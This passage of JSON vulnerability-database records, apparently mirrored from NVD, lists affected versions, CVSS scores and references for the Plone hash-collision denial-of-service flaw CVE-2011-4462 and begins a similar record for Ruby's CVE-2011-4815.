"cpe:2.3:a:plone:plone:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.5.1:*:*:*:*:*:*:*"], "cvelist": ["CVE-2011-4462"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-20"], "description": "Plone 4.1.3 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:11:25", "references": [{"idList": ["GHSA-PCWM-8JC3-QXVJ"], "type": "github"}, {"idList": ["SECURITYVULNS:DOC:27500"], "type": "securityvulns"}, {"idList": ["SSV:26121"], "type": "seebug"}], "rev": 2}, "score": {"modified": "2019-05-29T18:11:25", "rev": 2, "value": 5.5, "vector": "NONE"}}, "hash": "ed515c50fe3f3496a827b204c18b8ad881aa4b0a3e7eda7d14403d77c90d7397", "hashmap": [{"hash": "bcb9298e9dedfc5a20fdb3b772b56354", "key": "cvelist"}, {"hash": "ad53532f15ac2ce2f9b3d8c6c9513110", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "79f130ef461e5fcadeacc002df89c60a", "key": "modified"}, {"hash": "8ee79e05af07bf9f5b1f16b80ef48a0f", "key": "description"}, {"hash": "272f4cdb9efa2b45de25b45c68585342", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "63d1dafed59d9bded2a524b239235cfd", "key": "published"}, {"hash": "e14edcde3d845f7cbe8a8c8674566e1a", "key": "cpe23"}, {"hash": "85fc9715d07b57d9e72056856b007c7b", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "736a1ed0b7d76613eddb0b0826033359", "key": "references"}, {"hash": "a00e2d917951d29654756351de52a92a", "key": "cpe"}, {"hash": "41b62a8aa1ee5c40897717cadc30784a", "key": "cvss"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "ef8dc55e27badb345f85c3696c61eb1d", "key": "href"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4462", "id": "CVE-2011-4462", "lastseen": "2019-05-29T18:11:25", "modified": "2017-08-29T01:30:00", "objectVersion": "1.3", "published": "2011-12-30T01:55:00", "references": ["http://www.nruns.com/_downloads/advisory28122011.pdf", "http://archives.neohapsis.com/archives/bugtraq/2011-12/0181.html", "http://secunia.com/advisories/47406", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/72018"], "reporter": "cve@mitre.org", "title": "CVE-2011-4462", "type": "cve", "viewCount": 6}, "differentElements": ["cpe23", "cpe", "affectedSoftware"], "edition": 1, "lastseen": "2019-05-29T18:11:25"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "b83b72f8535b4a135351c45b03cd9b84"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "25d8c9d6f2d4709ad0ad6212d8369d9c"}, {"key": "cpe23", "hash": "13f9056adf02b8cd9f68359a4c55c94c"}, {"key": "cpeConfiguration", "hash": "4156377b513b2af5c962423e991c1ad2"}, {"key": "cvelist", "hash": "bcb9298e9dedfc5a20fdb3b772b56354"}, {"key": "cvss", "hash": "41b62a8aa1ee5c40897717cadc30784a"}, {"key": "cvss2", "hash": "85fc9715d07b57d9e72056856b007c7b"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "226da5129ffaaee3d5b48e506b957d58"}, {"key": "description", "hash": "8ee79e05af07bf9f5b1f16b80ef48a0f"}, {"key": "extraReferences", "hash": "52e44547de77c158411a779051afe6d2"}, {"key": "href", "hash": "ef8dc55e27badb345f85c3696c61eb1d"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "79f130ef461e5fcadeacc002df89c60a"}, {"key": "published", "hash": "63d1dafed59d9bded2a524b239235cfd"}, {"key": "references", "hash": "736a1ed0b7d76613eddb0b0826033359"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "272f4cdb9efa2b45de25b45c68585342"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "5b8935667bcae3e1a20868bf2e807d4834bde215ae7eed87d0032a46d0608603", "viewCount": 17, "enchantments": {"dependencies": {"references": [{"type": "ubuntucve", "idList": ["UB:CVE-2011-4462"]}, {"type": "github", "idList": ["GHSA-PCWM-8JC3-QXVJ"]}, {"type": "seebug", "idList": ["SSV:26121"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500"]}], "modified": "2021-04-22T23:19:43", "rev": 2}, "score": {"value": 5.5, "vector": "NONE", "modified": "2021-04-22T23:19:43", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/a:plone:plone:3.1.5.1", "cpe:/a:plone:plone:2.5.3", "cpe:/a:plone:plone:3.3.5", "cpe:/a:plone:plone:2.0.1", "cpe:/a:plone:plone:4.1.3", "cpe:/a:plone:plone:1.0", "cpe:/a:plone:plone:3.0", "cpe:/a:plone:plone:4.0.5", "cpe:/a:plone:plone:1.0.1", "cpe:/a:plone:plone:4.0.2", "cpe:/a:plone:plone:2.5.2", "cpe:/a:plone:plone:2.5.4", "cpe:/a:plone:plone:4.0", "cpe:/a:plone:plone:3.0.1", "cpe:/a:plone:plone:3.0.2", "cpe:/a:plone:plone:3.2", "cpe:/a:plone:plone:4.0.7", "cpe:/a:plone:plone:3.0.6", "cpe:/a:plone:plone:1.0.4", "cpe:/a:plone:plone:3.3.1", "cpe:/a:plone:plone:4.0.3", "cpe:/a:plone:plone:2.0.5", "cpe:/a:plone:plone:4.0.4", "cpe:/a:plone:plone:3.3.6", "cpe:/a:plone:plone:2.0", "cpe:/a:plone:plone:3.2.1", "cpe:/a:plone:plone:3.1.6", "cpe:/a:plone:plone:3.3", "cpe:/a:plone:plone:3.3.3", "cpe:/a:plone:plone:3.2.3", "cpe:/a:plone:plone:3.0.5", "cpe:/a:plone:plone:4.1.1", "cpe:/a:plone:plone:2.5.5", "cpe:/a:plone:plone:4.0.1", "cpe:/a:plone:plone:2.1.3", "cpe:/a:plone:plone:3.1.2", "cpe:/a:plone:plone:1.0.5", "cpe:/a:plone:plone:2.5.1", "cpe:/a:plone:plone:3.1.7", "cpe:/a:plone:plone:2.1.2", "cpe:/a:plone:plone:3.1.3", "cpe:/a:plone:plone:3.3.2", "cpe:/a:plone:plone:2.0.2", "cpe:/a:plone:plone:3.1", "cpe:/a:plone:plone:2.1", "cpe:/a:plone:plone:3.3.4", "cpe:/a:plone:plone:4.1", "cpe:/a:plone:plone:1.0.2", "cpe:/a:plone:plone:3.2.2", "cpe:/a:plone:plone:1.0.6", "cpe:/a:plone:plone:3.1.1", "cpe:/a:plone:plone:1.0.3", "cpe:/a:plone:plone:4.1.2", "cpe:/a:plone:plone:2.0.3", "cpe:/a:plone:plone:4.0.9", "cpe:/a:plone:plone:2.0.4", "cpe:/a:plone:plone:3.0.3", "cpe:/a:plone:plone:2.5", "cpe:/a:plone:plone:2.1.1", "cpe:/a:plone:plone:2.1.4", "cpe:/a:plone:plone:3.1.4", "cpe:/a:plone:plone:3.0.4"], "affectedSoftware": [{"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.2.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.9"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.7"}, {"cpeName": "plone:plone", "name": "plone", "operator": "le", "version": "4.1.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.1.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.6"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.1.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.6"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.6"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.2.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.6"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.5.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.7"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.2.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.2"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:plone:plone:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.5.1:*:*:*:*:*:*:*"], "cwe": ["CWE-20"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:plone:plone:3.2.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.1.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.1.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.1.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.1.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.1.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.2.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.1.3:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "4.1.3", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.5.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.1.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.2.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "47406", "refsource": "SECUNIA", "tags": [], "url": "http://secunia.com/advisories/47406"}, {"name": "VU#903934", "refsource": "CERT-VN", "tags": ["US Government Resource"], "url": "http://www.kb.cert.org/vuls/id/903934"}, {"name": "20111228 n.runs-SA-2011.004 - web programming languages and platforms - DoS through hash table", "refsource": "BUGTRAQ", "tags": [], "url": "http://archives.neohapsis.com/archives/bugtraq/2011-12/0181.html"}, {"name": "http://www.ocert.org/advisories/ocert-2011-003.html", "refsource": "MISC", "tags": [], "url": "http://www.ocert.org/advisories/ocert-2011-003.html"}, {"name": "plone-hash-dos(72018)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/72018"}, {"name": "http://www.nruns.com/_downloads/advisory28122011.pdf", "refsource": "MISC", "tags": [], "url": "http://www.nruns.com/_downloads/advisory28122011.pdf"}], "immutableFields": []}, {"id": "CVE-2011-4815", "bulletinFamily": "NVD", "title": "CVE-2011-4815", "description": "Ruby (aka CRuby) before 1.8.7-p357 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.", "published": "2011-12-30T01:55:00", "modified": "2017-08-29T01:30:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4815", "reporter": "cve@mitre.org", "references": ["http://www.nruns.com/_downloads/advisory28122011.pdf", "http://www.ruby-lang.org/en/news/2011/12/28/denial-of-service-attack-was-found-for-rubys-hash-algorithm/", "http://www.securitytracker.com/id?1026474", "http://archives.neohapsis.com/archives/bugtraq/2011-12/0181.html", "http://support.apple.com/kb/HT5281", 